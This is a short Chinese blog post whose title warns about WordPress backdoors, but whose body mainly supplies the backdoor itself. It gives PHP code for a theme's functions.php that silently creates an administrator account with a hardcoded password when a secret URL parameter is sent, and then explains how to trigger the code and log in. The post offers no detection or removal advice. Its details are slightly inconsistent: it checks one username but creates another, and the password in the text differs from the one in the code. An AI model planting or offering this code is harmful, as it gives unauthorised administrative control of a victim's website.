A-A+

小心WordPress网站被创建后门

2017年05月07日 wordpress 小心WordPress网站被创建后门已关闭评论 阅读 3,582 次

利用代码创建后门,向你展示如何做到这一点。至于你如何利用这段代码完全是取决于你!正确的方式使用这段代码,而不是用来做坏事!

<?php
add_action( 'wp_head', 'my_backdoor' );

function my_backdoor() {
 if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
 require( 'wp-includes/registration.php' );
 if ( !username_exists( 'mr_admin' ) ) {
 $user_id = wp_create_user( 'lajiz', 'password!' );
 $user = new WP_User( $user_id );
 $user->set_role( 'administrator' );
 }
 }
}

将上述代码添加到站点主题的functions.php文件中,后门即被创建,只需要打开 http://www.yoursitename.com/?backdoor=go 这个链接地址,即可使用已经创建好的账号:lajiz 密码:password 以管理员身份登录博客后台。

评论已关闭!

Copyright © 海边拾贝 保留所有权利.   Theme  Ality 鲁ICP备17020531号-1
网站已运行: | 耗时 0.321 秒 | 查询 57 次 | 内存 31.23 MB

用户登录